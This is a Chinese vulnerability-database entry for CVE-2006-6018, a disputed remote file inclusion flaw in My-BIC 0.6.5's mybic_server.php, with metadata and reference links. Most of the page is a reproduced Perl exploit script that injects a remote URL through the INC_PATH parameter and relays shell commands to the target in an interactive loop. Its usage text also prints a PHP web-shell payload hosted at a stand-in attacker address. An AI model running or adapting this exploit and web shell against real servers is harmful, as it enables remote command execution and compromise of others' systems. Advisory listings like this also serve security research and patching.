Jim Plush My-BIC mybic_server.php PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192819 漏洞类型 未知
发布时间 2006-11-21 更新时间 2006-12-19
CVE编号 CVE-2006-6018 CNNVD-ID CNNVD-200611-338
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006110094
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-338
|漏洞详情
**争议**JimPlushMy-BIC0.6.5中的mybic_server.php存在PHP远程文件包含漏洞,远程攻击者可以通过在INC_PATH参数内的URL来执行任意PHP代码,是不同于CVE-2006-5089的参数。注:CVE和第三方研究者对此问题有争议,因为INC_PATH是一个常量。
|漏洞EXP
#!/usr/bin/perl
# My-BIC => 0.6.5 Remote File Include Vulnerability Exploit
# Script.............. : My-BIC
# Expl0iter.... : the_Edit0r	
# Location .......... : Iran
# Class..............  : Remote
# Original Advisory : http://Www.Xmors.com ( Pablic ) http://Www.Xmors.net (pirv8)
# We ArE : Scorpiunix , KAMY4r , Sh3ll , SilliCONIC , Zer0.C0d3r 
#     D3vil_B0y_ir , Tornado , DarkAngel , Behbood
# <Spical TNX Irania Hackers :
#  ( Aria-Security , Crouz , virangar ,DeltaHacking , Iranhackers
#   Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev, Virangar )

use LWP::Simple;

print "...............................................................n";
print ".                                                             .n";
print ".     My-BIC => 0.6.5 Remote File Include Vulnerability       .n";
print ".                                                             .n";
print "...............................................................n";
print ".                                                             .n";
print ".                Xmors  NetWork Security TeaM                 .n";
print ".                 Discovered By : the_Edit0r                  .n";
print ".                                                             .n";
print "...............................................................n";
print ".                                                             .n";
print ".                    Www.Xmors.coM (Pablic )                  .n";
print ".                    www.Xmors.neT ( Pirv8 )                  .n";
print "...............................................................n";
print "n";
print "                   I Love HacK & SecUrity                      n";
print "nn";

my $kw3,$path,$shell,$conexiune,$cmd,$data ;

if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);}

$path = $ARGV[0];
chomp($path);
$shell = $ARGV[1];	
chomp($shell);
    
$path = $path."mybic_server.php?INC_PATH=";

sub usage(){
	print "Usage    : perl $0 host/path http://site.com/cmd.txtnn";
	print "Example  : perl $0 http://127.0.0.1 http://site.com/cmd.txtnn";
        print 'Shell    : <?php ob_clean();ini_set("max_execution_time",0);passthru($_GET["cmd"]);die;?>
';
           }

while ()  
{  
print "[the_Edit0r]";
chomp($cmd=<STDIN>);
if ($cmd eq "exit") { exit(0);}

$kw3 = $path."?lan=".$shell."?&cmd=".$cmd; 
if ($cmd eq "")     
  { print "Enter your command !n"; }
else 
  { $data=get($kw3); print $data ; }
}
|参考资料

来源:XF
名称:mybic-mybic-file-include(30361)
链接:http://xforce.iss.net/xforce/xfdb/30361
来源:BUGTRAQ
名称:20061116My-BIC=>0.6.5RemoteFileIncludeVulnerabilityExploit
链接:http://www.securityfocus.com/archive/1/archive/1/451876/100/0/threaded
来源:OSVDB
名称:31542
链接:http://osvdb.org/31542
来源:VIM
名称:20061117Fwd:My-BIC=>0.6.5RemoteFileIncludeVulnerabilityExploit
链接:http://attrition.org/pipermail/vim/2006-November/001127.html
来源:SREASON
名称:1891
链接:http://securityreason.com/securityalert/1891